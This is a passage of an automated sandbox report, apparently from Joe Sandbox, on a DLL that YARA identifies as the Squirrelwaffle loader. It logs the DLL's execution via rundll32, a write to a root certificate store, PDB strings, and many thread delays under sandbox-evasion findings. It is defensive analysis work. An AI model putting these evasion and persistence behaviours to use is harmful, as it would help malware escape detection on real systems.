                  Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6688 -s 732
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04570C64
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_045709F4
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 00946354 appears 48 times
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00968354 NtdllDefWindowProc_A,
                  Source: p2SijKiqgZ.dllStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                  Source: p2SijKiqgZ.dllReversingLabs: Detection: 15%
                  Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\p2SijKiqgZ.dll'
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\p2SijKiqgZ.dll',#1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\p2SijKiqgZ.dll',#1
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6688 -s 732
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\p2SijKiqgZ.dll',#1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\p2SijKiqgZ.dll',#1
                  Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                  Source: C:\Windows\System32\loaddll32.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8408FE5CA4467EE4DA84A76EF238FE3Jump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER920C.tmpJump to behavior
                  Source: classification engineClassification label: mal100.troj.evad.winDLL@6/10@207/6
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00948554 GetDiskFreeSpaceA,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00960800 GetLastError,FormatMessageA,
                  Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                  Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\p2SijKiqgZ.dll',#1
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6688
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00959220 FindResourceA,LoadResource,SizeofResource,LockResource,
                  Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000006.00000003.259967612.0000000004F0D000.00000004.00000001.sdmp
                  Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: version.pdb} source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
                  Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: wntdll.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
                  Source: Binary string: shcore.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
                  Source: Binary string: fltLib.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: advapi32.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: shell32.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
                  Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
                  Source: Binary string: wimm32.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: mpr.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
                  Source: Binary string: setupapi.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: msvcp140.i386.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: shlwapi.pdb{ source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: shcore.pdbk source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: iphlpapi.pdbt source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: profapi.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: winspool.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
                  Source: Binary string: shell32.pdbk source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: sechost.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: propsys.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: wsspicli.pdbc source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: powrprof.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: msctf.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: ole32.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: version.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
                  Source: Binary string: vcruntime140.i386.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: winspool.pdbe source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: wUxTheme.pdb# source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: cryptbase.pdbw source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: sechost.pdbi source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: netapi32.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: combase.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: C:\Users\Administrator\source\repos\Dll1\Release\Dll1.pdb source: loaddll32.exe, 00000000.00000002.518246060.0000000002A70000.00000040.00000001.sdmp, rundll32.exe
                  Source: Binary string: rundll32.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
                  Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: sfc.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: apphelp.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
                  Source: Binary string: wuser32.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
                  Source: Binary string: advapi32.pdb_ source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: comctl32.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: netutils.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp

                  Data Obfuscation:

                  barindex
                  Yara detected SquirrelwaffleShow sources
                  Source: Yara matchFile source: 0.2.loaddll32.exe.2630000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.0.rundll32.exe.4590000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.loaddll32.exe.2a70184.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.rundll32.exe.45a0000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.loaddll32.exe.9b0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.0.rundll32.exe.4570184.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.rundll32.exe.4570184.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.0.rundll32.exe.45a0000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.0.rundll32.exe.4590000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.rundll32.exe.4590000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.0.rundll32.exe.45a0000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.0.rundll32.exe.4570184.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000000.254857742.0000000004590000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.515938362.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000000.253813077.0000000004590000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.284559646.0000000004590000.00000040.00000001.sdmp, type: MEMORY
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_03B213EC push ecx; ret
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_03B22371 push FFFFFFC0h; ret
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_03B25282 push edi; ret
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_03B28022 push cs; ret
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_03B28070 push cs; ret
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_03B25776 push ebx; ret
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_03B274B8 push esp; ret
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_03B2BBF7 push esi; retf
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_009470A4 push 009470D0h; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_009460F8 push 00946124h; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0096811C push 00968175h; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0095414C push 00954199h; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00946170 push 0094619Ch; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00965170 push 0096519Ch; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0094D28C push 0094D408h; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0095421C push 00954248h; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00965264 push 00965290h; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0094D48C push 0094D4B8h; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0094D40C push 0094D47Bh; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0096A584 push 0096A5F9h; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0096A5FC push 0096A655h; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0097062C push ecx; mov dword ptr [esp], ecx
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00968794 push 009687D7h; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00969798 push 009697C4h; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_009537F0 push 00953898h; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0096974C push 0096978Eh; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00953778 push 009537EEh; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0097B760 push ecx; mov dword ptr [esp], edx
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_009688D8 push 00968904h; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_009678E0 push 0096792Fh; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0096880C push 00968838h; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00967154 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SendMessageA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,EndDeferWindowPos,GetProcAddress,BeginDeferWindowPos,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                  Source: C:\Windows\System32\loaddll32.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 BlobJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0096549C IsIconic,GetWindowPlacement,GetWindowRect,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_009756F4 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00974E40 CreateIconFromResourceEx,IsIconic,GetCapture,SetActiveWindow,DrawStateW,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00975F74 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00967154 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SendMessageA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,EndDeferWindowPos,GetProcAddress,BeginDeferWindowPos,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                  Source: C:\Windows\System32\loaddll32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion:

                  barindex
                  Contains functionality to detect sleep reduction / modificationsShow sources
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0096A484
                  Source: C:\Windows\System32\loaddll32.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0096A484
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00960D90 GetSystemInfo,GetKeyState,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_009452FC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 30586
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 41872
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 41905
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32350
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 34986
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 31654
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 31970
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 33700
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 38480
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 33485
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 43832
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 42267
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 33837
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32078
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 37513
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 38304
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 31708
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 39889
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32221
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32723
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 38299
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 44379
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 43297
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 41668
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 30142
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 40381
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 37021
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 30435
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 41835
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 34687
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 37017
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 36437
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 39186
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 34553
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 36196
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 41187
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 43835
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 41523
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 34936
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 37574
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 43310
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 33772
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32630
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 42429
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 31133
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 40873
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 33556
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 39879
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 34810
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 42545
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 37678
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 40066
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 31485
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 38215
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 42541
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32767
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32836
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 37699
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 43190
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 36106
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 37489
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 30692
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 31496
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 37661
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 42750
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 41555
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 39387
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 34689
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 41212
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 35306
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 36113
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 44451
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 44002
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 34889
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 37301
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 30890
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 39251
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 37667
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 33391
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 34590
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 37221
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 31275
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 43403
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 42938
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 43729
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32680
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 38620
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 33009
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 34668
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32441
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 39493
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 40555
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 35008
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 38823
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 38501
